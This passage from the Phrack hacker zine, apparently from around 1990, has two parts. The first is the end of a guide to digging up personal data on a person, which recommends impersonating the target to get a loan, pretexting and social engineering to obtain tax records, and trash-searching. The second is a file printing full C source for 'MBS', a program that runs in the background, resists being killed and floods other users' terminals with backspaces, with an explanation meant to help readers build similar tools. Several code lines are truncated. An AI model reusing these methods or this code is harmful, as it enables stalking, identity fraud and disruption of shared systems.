Post Office, Voter Registration, Former Neighbors, Former Utilities (water, gas,
electric, phone, cable, etc.)
If you know someone who works at a bank or car dealer you could have them run
a credit check which will reveal all of their credit cards and if they have
ever had any late payments or applied for any loans. If you are brave enough
you could even apply for a loan impersonating the individual under investigation
The Credit Bureau also has Sentry Services that can provide deceased social
security numbers, postal drop box address and known fraudulent information.
You can get an individuals driving record by sending a letter to your states
Department of Revenue, Division of Vehicles. You can also get the following:
Driver Control Bureau
For Driving Record send Name, Address, Date of Birth and usually a $1 process-
ing fee for a 5 year record.
Titles & Registration Bureau
For ownership information (current and past).
Driver License Examination Bureau
To see what vision was rated.
Motor Carrier Inspection & Registration Bureau
To check on licensing and registration of trucks/trucking companies.
Revocation Dept
Can verify if someone's driver's license has ever been suspended or revoked.
You can even obtain a complete vehicle history by sending the vehicle descrip-
tion, identification # for the last registered owner, and a small fee. Send
this info to your states Dept of Vehicles. It is best to contact them first
to get their exact address and fees. I would advise using a money orders and
a P.O. Box so they cannot trace it to you without a hassle.
Police Records
All Police and Fire Records are Public record unless the city is involved.
You can usually get everything available from the police dept including:
Interviews, maps, diagrams, misc reports, etc.
FBI Records
If the individual you are inquiring about is deceased the FBI will provide
some info if you give them Full Name, SSN, Date & Place of Birth. Contact
you local FBI office to get the details.
Real Estate Records
Recorder of Deeds offices in each county maintain land ownership records.
Most are not computerized and you have to manually search. Then you must
review microfilm/fiche for actual deeds of trust, quit claim deeds,
assignments, mortgage, liens, etc.
A title company can run an Ownership & Equity (O&E) search for a fee ($80-$100)
which will show ownership, mortgage info, easements, taxes owned, taxes
assessed, etc.
Most county assessors will provide an address and value of any real property
if you request a search by name.
Social Security Records
Social Security Administrator
Office of Central Records Operations
300 North Greene Street
Baltimore, Maryland 21201
301-965-8882
Title II and Title XVI disability claims records, info regarding total earnings
for each year, detailed earnings information show employer, total earnings, and
social security paid for each quarter by employer.
Prices are approximately as follows:
1st year of records $15.00
2nd-5th year of records $ 2.50 per person
6th-10th year of records $ 2.00 per person
11th-15th year of records $ 1.50 per person
16th-on year of records $ 1.00 per person
** Call for verification of these prices. **
Social Security records are a great source of information when someone has
been relatively transient in their work, or if they are employed out of a
union hall.
If you want to review a claim file, direct your request to the Baltimore
office. They will send the file to the social security office in your city
for you to review and decide what you want copies of.
The first three digits of a social security number indicate the state of
application.
The Social Security Number
SSA has continually emphasized the fact that the SSN identifies a particular
record only and the Social Security Card indicates the person whose record is
identified by that number. In no way can the Social Security Card identify
the bearer. From 1946 to 1972 the legend "Not for Identification" was printed
on the face of the card. However, many people ignored the message and the
legend was eventually dropped. The social security number is the most widely
used and carefully controlled number in the country, which makes it an
attractive identifier.
With the exception of the restrictions imposed on Federal and some State and
local organizations by the Privacy Act of 1974, organizations requiring a
unique identifier for purposes of controlling their records are not prohibited
from using (with the consent of the holder) the SSN. SSA records are
confidential and knowledge of a person's SSN does not give the user access to
information in SSA files which is confidential by law.
Many commercial enterprises have used the SSN in various promotional efforts.
These uses are not authorized by SSA, but SSA has no authority to prohibit
such activities as most are not illegal. Some of these unauthorized uses are:
SSN contests; skip-tracers; sale or distribution of plastic or metal cards;
pocketbook numbers (the numbers used on sample social security cards in
wallets); misleading advertising, commercial enterprises charging fees for SSN
services; identification of personal property.
The Social Security Number (SSN) is composed of 3 parts, XXX-XX-XXXX, called
the Area, Group, and Serial. For the most part, (there are exceptions), the
Area is determined by where the individual APPLIED for the SSN (before 1972)
or RESIDED at time of application (after 1972). The areas are assigned as
follows:
000 unused 387-399 WI 528-529 UT
001-003 NH 400-407 KY 530 NV
004-007 ME 408-415 TN 531-539 WA
008-009 VT 416-424 AL 540-544 OR
010-034 MA 425-428 MS 545-573 CA
035-039 RI 429-432 AR 574 AK
040-049 CT 433-439 LA 575-576 HI
050-134 NY 440-448 OK 577-579 DC
135-158 NJ 449-467 TX 580 VI Virgin Islands
159-211 PA 468-477 MN 581-584 PR Puerto Rico
212-220 MD 478-485 IA 585 NM
221-222 DE 486-500 MO 586 PI Pacific Islands*
223-231 VA 501-502 ND 587-588 MS
232-236 WV 503-504 SD 589-595 FL
237-246 NC 505-508 NE 596-599 PR Puerto Rico
247-251 SC 509-515 KS 600-601 AZ
252-260 GA 516-517 MT 602-626 CA
261-267 FL 518-519 ID *Guam, American Samoa,
268-302 OH 520 WY Northern Mariana Islands,
303-317 IN 521-524 CO Philippine Islands
318-361 IL 525 NM
362-386 MI 526-527 AZ
627-699 unassigned, for future use
700-728 Railroad workers through 1963, then discontinued
729-899 unassigned, for future use
900-999 not valid SSNs, but were used for program purposes
when state aid to the aged, blind and disabled was
converted to a federal program administered by SSA.
As the Areas assigned to a locality are exhausted, new areas from the pool are
assigned. This is why some states have non-contiguous groups of Areas.
The Group portion of the SSN has no meaning other than to determine whether or
not a number has been assigned. SSA publishes a list every month of the
highest group assigned for each SSN Area. The order of assignment for the
Groups is: odd numbers under 10, even numbers over 9, even numbers under 9
except for 00 which is never used, and odd numbers over 10. For example, if the
highest group assigned for area 999 is 72, then we know that the number
999-04-1234 is an invalid number because even Groups under 9 have not yet been
assigned.
The Serial portion of the SSN has no meaning. The Serial is not assigned in
strictly numerical order. The Serial 0000 is never assigned.
Before 1973, Social Security Cards with pre-printed numbers were issued to
each local SSA office. The numbers were assigned by the local office. In 1973,
SSN assignment was automated and outstanding stocks of pre-printed cards were
destroyed. All SSNs are now assigned by computer from headquarters. There
are rare cases in which the computer system can be forced to accept a manual
assignment such as a person refusing a number with 666 in it.
A pamphlet entitled "The Social Security Number" (Pub. No.05-10633) provides
an explanation of the SSN's structure and the method of assigning and
validating Social Security numbers.
Tax Records
If you can find out who does the individuals taxes you might be able to get
copies from them with the use of creative social engineering.
If you want to run a tax lien search there is a service called Infoquest.
1-800-777-8567 for a fee. Call with a specific request.
Post Office Records
If you have an address for someone that is not current, always consider writing
a letter to the postmaster of whatever post office branch services the zip code
of the missing person. Provide them the name and the last known address and
simply ask for the current address. There might be a $1 fee for this so it
would be wise to call first.
City Directory, Polk's, Cole's, etc.
Information in these directories is contained alphabetically by name,
geographically by street address, and numerically by telephone number, so if
you have any of those three pieces of info, a check can be done. The Polk's
directory also shows whether the person owns their home or rents, their marital
status, place of employment, and a myriad of other tidbits of information.
However, these books are not the be-all and end-all of the information as they
are subject to public and corporate response to surveys. These directories are
published on a nationwide basis so if you are looking for someone outside of
your area, simply call the public library in the area you have an interest and
they also can perform a crisscross check for you.
You can also call a service owned by Cole's called the National Look up Library
at 402-473-9717 and either give a phone number and get the name & address or
give the address and get the name and phone number. This is only available to
subscribers, which costs $183.00 dollars for 1991. A subscriber gets two free
lookups per day and everyone after that costs $1.25. A subscriber can also mail
in a request for a lookup to:
National Look Up Library
901 W. Bond Street
Lincoln, NE 68521-3694
A company called Cheshunoff & Company can, for a $75 fee, obtain a 5-year
detailed financial analysis of any bank.
505 Barton Springs Road
Austin, Texas 78704
512-472-2244
Professional Credit Checker & Nationwide SSN-locate.
!Solutions! Publishing Co.
8016 Plainfield Road
Cincinnati, Ohio 45236
513-891-6145
1-800-255-6643
Top Secret Manuals
Consumertronics
2011 Crescent Drive
P.O. Drawer 537-X
Alamogordo, New Mexico 88310
505-434-0234
Federal Government Information Center is located at
1520 Market Street
St. Louis, Missouri
1-800-392-7711
U.S. Dept of Agriculture has located aerial photos of every inch of the United
States.
2222 West 2300 S.
P.O. Box 36010
Salt Lake City, Utah 84130
801-524-5856
To obtain general information regarding registered agent, principals, and good
standing status, simply call the Corporate Division of the Secretary of State
and they will provide that information over the phone. Some corporate divisions
are here:
Arkansas Corporate Division 501-371-5151
Deleware Corporate Division 302-736-3073
Georgia Corporate Division 404-656-2817
Indiana Corporate Division 317-232-6576
Kansas Corporate Division 913-296-2236
Louisiana Corporate Division 504-925-4716
Missouri Corporate Division 314-751-4936
New York Corporate Division 518-474-6200
Texas Corporate Division 512-475-3551
Freedom Of Information
The Freedom of Information Act allows the public to request information
submitted to, or generated by, all executive departments, military departments,
government or government controlled corporations, and regulatory agencies. Each
agency, as described above, publishes in the Federal Register, descriptions of
its central and field organizations and places where and how requests are to be
directed. Direct a letter to the appropriate person designated in the Federal
Register requesting reasonably described records be released to you pursuant to
the Freedom of Information Act. Be sure to follow each agency's individually
published rules which state the time, place, fees, and procedures for the
provisions of information. The agency should promptly respond.
How to Find Information About Companies, Ed. II, 1981, suggests, "Government
personnel you deal with sometimes become less helpful if you approach the
subject by threatening the Freedom of Information Act action - it's best to ask
for the material informally first." While this will probably enable you to find
the correct person to send your request to, be prepared to spend at least half
an hour on the phone talking to several people before you find the person who
can help you. The book also has a brief description of what each governmental
agency handles.
If you want to see if someone you are trying to locate is a veteran, has a
federal VA loan, or receives some sort of disability benefit, use Freedom
of Information and provide the person's SSN.
You will get a bill but you can ask for a fee waiver if this contributes to a
public understanding of the operation of the government. You can also request
an opportunity to go through the files yourself and then decide what you want
copied.
Insurance Records
PIP carrier records (may contain statements, medical records, new doctors/
hospital names, records of disability payments, adjuster's opinions,
applications for insurance coverage, other claim info, etc.)
Health insurance records (may contain medical records, record of bills, new
doctors/hospital names, pre-existing conditions information, info regarding
other accidetns/injuries, etc.)
Often you will have to go through the claims office, the underwriting dept, and
the business office to get complete records as each individual dept maintains
its own seperate files.
Workers Compensation
Some states will let you simply request records. Just submit your request
including the SSN and Birthdate, to the Department of Human Resources, Division
of Worker's Compensation. They will photocopy the records and send you the
copies. Other states require an authorization to obtain these records.
You can always call your local Private Investigator pretending you are a
student doing a research paper on the methods of getting personal information
about people or even trash his place to find tips on tracking down people.
I hope this PHILE helps you in one way or another, if not, maybe a future PHILE
by The Butler will...........
Till Next Time,
The Butler...
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #5 of 12
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
%P P%
%H C UNIX `nasties' PART I H%
%A by A%
%Z Sir Hackalot of PHAZE (10/20/90) Z%
%E E%
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
o Purpose of this file:
The purpose of this file is to share small C programs for the Unix
System V and/or BSD 4.3 operating systems which as in logical terms,
"Nasty". This "Nasty" can be termed better as Annoyance programs
or tricky programs.
The purpose of this text however, is NOT to teach one how to program
in C and or how to use the C compiler on Unix systems. This textfile
assumes you have a working knowledge of programming with C in the
UNIX environment.
o The UTMP Reader:
~~~~~~~~~~~~~~~~
First, I would like to start this text off by posting in a generic
/etc/utmp reader. The /etc/utmp reader is essential for applications
that deal with all the users online at a given time.
Here is the source:
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
/* WhatTTY -- Generic WHO
UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe
This is basically a skeleton program that is just a base for any UTMP
operations.
This is the skeleton that PhaZe(soft) uses for anything that deals
with reading the utmp file, such as MBS, SEND, VW, MME, and other
utilities.
Applications: You can use this when you need to do something to
everyone online, or when you need some sort of data from utmp, wtmp
or any file that is like utmp.
*/
#include
#include /* This is the key to the whole thing */
#include
#include
main()
{
int handle;
char *etc = "/etc/utmp";
struct utmp user;
handle = open(etc,O_RDONLY);
while(read(handle,&user,sizeof(user)) != 0) {
if (user.ut_type == USER_PROCESS)
printf("%s is on %s\n",user.ut_name,user.ut_line);
}
close(handle);
/* Simple, Right? */
/* To see anything that is waiting for a login, change USER_PROCESS
to LOGIN_PROCESS */
}
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
In the above program, this is what happens:
1. I assigned the variable "etc" to point at the string
"/etc/utmp", which is the utmp file.
2. I opened in in Read ONLY mode (O_RDONLY).
3. I started a loop that does not end until 0 bytes are
read into the user structure. The 0 bytes would mean
end of file.
Notice the line:
if (user.ut_type == USER_PROCESS)
What the above line does is to distinguish between a user
and a terminal waiting for a Login. The ut_type is defined
in utmp.h. There are many types. One of them is LOGIN_PROCESS.
That will be a terminal waiting for a login. If you wanted to see
all the TTYs waiting to be logged in on, you would change the
USER_PROCESS to LOGIN_PROCESS. Other types are things like
INIT_PROCESS. You can just look in utmp.h to see them.
Also notice that I have inclide "sys/types.h". If you do not include
this file, there will be an error in utmp.h, and other headers.
types.h has definitions for other TYPES of data, etc. So, if in
a header file you encounter a syntax error, you might need to include
sys/types.h
This program is just a skeleton, although it does print out who
is logged on, and to what TTY they are on. You will see how this
skeleton I wrote can be used. I used it to write MBS.
_______________________________________________________________________________
o MBS -- Mass BackSpace virus:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MBS may not be considered a virus, since it does not replicate
itself. However, it does "infect" every user that logs in, provided
the conditions are right.
The MBS virus uses the utmp reader to constantly read the utmp
file to find its next victim. Thus, eventually getting everyone, then
recycling to start again. Therefore catching people who login after
it is started.
Lets look at the source:
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
#include
#include
#include
#include
#include
/*
MBS - Mass BackSpace Virus!! v2.2 Deluxe+
(c) 1990 - Sir Hackalot
PhaZeSOFT Ltd.
*/
char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
int maxitem = 5; /* Should be total # of immune dudes */
int truefalse = 0;
int warn[10],bad;
char full_tty[15], text[160], kstr[80];
FILE *to_tty, *strm;
struct utmp u;
void kmes(fmt,boo)
char *fmt;
int boo;
{
if (boo != 0) {
printf("MBS_KERN: ");
printf("%s",fmt);
}
if (boo == 0) {
sprintf(full_tty,"/dev/%s",u.ut_line);
to_tty = fopen(full_tty,"w");
fprintf(to_tty,"MBS_KERN: %s",fmt);
fclose(to_tty);
}
}
void initit() { /* Initialize our little "kernel" */
int xxx = 0;
strcpy(ent[0],"technic");
strcpy(ent[1],"merlin");
strcpy(ent[2],"datawiz");
strcpy(ent[3],"par");
strcpy(ent[4],"Epsilon");
while (xxx < 11) {
warn[xxx] = 0;
xxx++;
}
kmes("Kernel Started.\n",1);
}
void warnem(wcnt) /* Notify all the immune people ... */
int wcnt;
{
if (bad == 0) { /* keep from dumping core to disk */
if (warn[wcnt] < 2) {
sprintf(kstr,"%s has started a backspace virus!\n",getlo
kmes(kstr,0);
warn[wcnt]++;
}
}
}
int checkent(uname) /* Check for immunity */
char *uname;
{
int cnt = 0;
truefalse = 0; /* assume NOT immune */
while (cnt < maxitem) {
if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
truefalse = 1;
warn[cnt]++; /* increment warning variable */
warnem(cnt); /* warn him if we have not */
}
cnt++;
}
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}
/* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
to intercept it, and notify use */
void sig_hand(sig)
int sig;
{
if(sig == 3) kmes("Ignoring Interrupt\n",1);
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
if(sig == 4) kmes("Ignoring quit signal.\n",1);
}
main(argc,argv)
int argc;
char *argv[];
{
int prio,pid,isg,handle;
char buf[80];
char name[20],tty[20],time[20];
initit();
if (argc < 2) prio = 20;
if (argc == 2) prio = atoi(argv[1]);
if ((pid = fork()) > 0) {
printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
printf("Another Fine PhaZeSOFT production\n");
printf("Thanks to The DataWizard for Testing this\n");
printf("Hello to The Conflict\n");
sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
kmes(kstr,1);
exit(0); /* KILL MOTHER PID, return to Shell & go background */
}
nice(prio);
signal(SIGQUIT,sig_hand);
signal(SIGINT,sig_hand);
signal(SIGTERM,sig_hand);
/* That makes sure you HAVE to do a -9 or -10 to kill this thing.
Sometimes, hitting control-c will kill of background processes!
Add this line if you want it to continue after you hangup:
signal(SIGHUP,SIG_IGN);
doing it will have the same effect as using NOHUP to
to execute it. Get it? Nohup = no SIGHUP
*/
while(1) { /* "Kernel" Begins here and never ends */
handle = open("/etc/utmp",O_RDONLY);
while (read(handle,&u,sizeof(u)) != 0) {
bad = 0;
sprintf(full_tty,"/dev/%s",u.ut_line);
if (strcmp(u.ut_name,getlogin()) != 0) {
/* Fix: Below is a line that optimizes the hosing/immune process
It skips the utmp entry if it is not a user. If it is, it
checks for immunity, then comes back. This is alot faster
and does not wear down cpu time/power */
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
else isg = 1;
if (isg != 1) {
if((to_tty = fopen(full_tty,"w")) == NUL
bad = 1;
}
if (bad == 0) {
fprintf (to_tty, "\b\b\b");
fflush (to_tty);
}
fclose(to_tty);
}
}
}
close (handle);
}
}
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
I am going to try to take this bit by bit and explain how it works
so that maybe you can come up with some good ideas on creating
something similar.
I will start with the MAIN function. Here it is:
___
main(argc,argv)
int argc;
char *argv[];
{
int prio,pid,isg,handle;
char buf[80];
char name[20],tty[20],time[20];
initit();
___
Obviously, this is the part of the code which initializes the main
variables used. The "main(argc,argv)" is there so it can accept
command line parameters. The command line parameters are just
for speed customization, which I will discuss later. Notice how
the variables are defined for the command line parameters:
int argc, char *argv[];
argc is the number of arguments, INCLUDING the name of the current
executable running. argv[] holds the strings in an array which make
up the parameters passed. argv[0] holds the name of the program,
while argv[1] holds the 1st parameter entered on the command line.
initit() is called to set up the necessary tables. All of
the variables defined at the top of the program are global, and alot
of these functions use the global variables, as does initit();.
___
if (argc < 2) prio = 20;
if (argc == 2) prio = atoi(argv[1]);
___
Ok, the above two lines essentially parse the command line.
The MBS program only accepts ONE argument, which is the priority
value to add to the normal process priority. This is so you
can customize how fast MBS runs. If you want to burn CPU time,
you would invoke mbs by:
$ mbs 0
That would make the priority as fast as the current can run something.
MBS's default priority setting is 20, so that CPU time will be saved.
MBS is very fast however, and since alot of Unix systems like to
cache alot of frequently used data from disks, it gets fast after
it reads utmp a few times, since utmp will be cached until it changes.
However, you can run MBS with a number from 0-19, the higher the
number, the "less" priority it will have with the cpu.
___
if ((pid = fork()) > 0) {
printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
printf("Another Fine PhaZeSOFT production\n");
sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
kmes(kstr,1);
exit(0); /* KILL MOTHER PID, return to Shell & go background */
}
___
The above is what sends MBS into the background. It calls fork(),
which creates another process off the old one. However, fork()
can be considered "cloning" a process, since it will use anything
beneath it. So, now you can assume there are TWO copies of MBS
running -- One in the foreground, and one in the background. However,
you may notice the exit(0). That first exit kills off the parent.
a second call to exit() would kill the child as well. notice the
call to "kmes". kmes is just a function that is defined earlier,
which I will discuss later.
___
nice(prio);
signal(SIGQUIT,sig_hand);
signal(SIGINT,sig_hand);
signal(SIGTERM,sig_hand);
/* signal(SIGHUP,SIG_IGN); */
___
The above code is integral for the survival of the MBS program in
memory. The nice(prio) is what sets the new priority determined
by the command line parsing.
The signal() statements are basically what keeps MBS running. What
it does is catch INTERRUPTS, Quits, and a regular call to KILL.
the commented out portion would ignore requests to kill upon hangup.
This would keep MBS in the background after you logged off.
Why do this? Well, remember that the parent was affected by
its environment? Well, the new forked process is too. That means,
if you were 'cat'ting a file, and hit control-C to stop it, the
cat process would stop, but push the signal on to MBS, which would
cause MBS to exit, if it did not have a signal handler. The signal
calls setup signal handlers. What they do is tell the program
to goto the function sig_hand() when one of the 3 signals is
encountered. The commented signal just tells the program to ignore
the hangup signal. The sig_hand argument can be replaced with
SIG_IGN if you just want to plain ignore the signal and not handle it.
The SIGQUIT is sometimes the control-D character. That is why it
also must be dealt with. If the signals aren't ignored or caught,
MBS can easily kicked out of memory by YOU, by accident of course.
___
while(1) { /* "Kernel" Begins here and never ends */
handle = open("/etc/utmp",O_RDONLY);
___
The above starts the main loop. The begining of the loop is to open
the utmp file.
___
while (read(handle,&u,sizeof(u)) != 0) {
bad = 0;
sprintf(full_tty,"/dev/%s",u.ut_line);
if (strcmp(u.ut_name,getlogin()) != 0) {
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
else isg = 1;
if (isg != 1) {
if((to_tty = fopen(full_tty,"w")) == NULL) {
bad = 1;
}
if (bad == 0) {
fprintf (to_tty, "\b\b\b");
fflush (to_tty);
}
fclose(to_tty);
}
}
___
Above is the sub_main loop. what it does is go through the utmp
file, and on each entry, it prepares a path name to the TTY
of the current utmp entry (sprintf(fulltty...)). Then it checks
to see if it is YOU. If it is, the loop ends. If it is not, then
it sees if it is a User. If not, it ends the loop and goes to
the next.
If it is a user, it goes to checkent to see if that user has been
declared immune in the immunity tables (down below later..).
If the idiot is not immune, it attempts to open their tty. If it
cannot, it sets the bad flag, then ends the loop. If it can be
written to, it sends three backspaces, according to YOUR tty specs.
Then, it closes the opened tty, and the loop continues until the end.
___
}
close (handle);
}
}
___
The above is the end of the main loop. It closes handle (utmp) so
it can be reopened at the start of the loop at the beginning of the
file. The reason to not create a table of people to hit in memory
after one reading is so that MBS will stop after people logoff, and
to start when new ones logon. The constant reading of the utmp
file makes sure everyone gets hit, except immune people. Also,
the file must be closed before reopening, or else, after a few opens,
things will go to hell.
Here is the signal handler:
___
void sig_hand(sig)
int sig;
{
if(sig == 3) kmes("Ignoring Interrupt\n",1);
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
if(sig == 4) kmes("Ignoring quit signal.\n",1);
}
___
It is very simple. when a signal is caught and sent to the handler,
the library function SIGNAL sends the signal number as an argument
to the function. The ones handled here are 3,4, and 15. But
this was just for effect. You could just have it print one line
no matter what the signal was, or just rip this function out and
put in SIG_IGN in the signal calls.
Below is the immunity check:
___
int checkent(uname) /* Check for immunity */
char *uname;
{
int cnt = 0;
truefalse = 0; /* assume NOT immune */
while (cnt < maxitem) {
if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
truefalse = 1;
warn[cnt]++; /* increment warning variable */
warnem(cnt); /* warn him if we have not */
}
cnt++;
}
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}
___
Above, you see variables used that are not defined. They are
just variables that were declared as globals at the begining.
What this does is just compare the login name sent to it with
every name in the immunity table. If it finds the name on
the table matches, it will go and see if it should warn the
user. Also, the warn count is incremented so that the warning
function will know if the user has been warned.
Here is the warning function:
___
|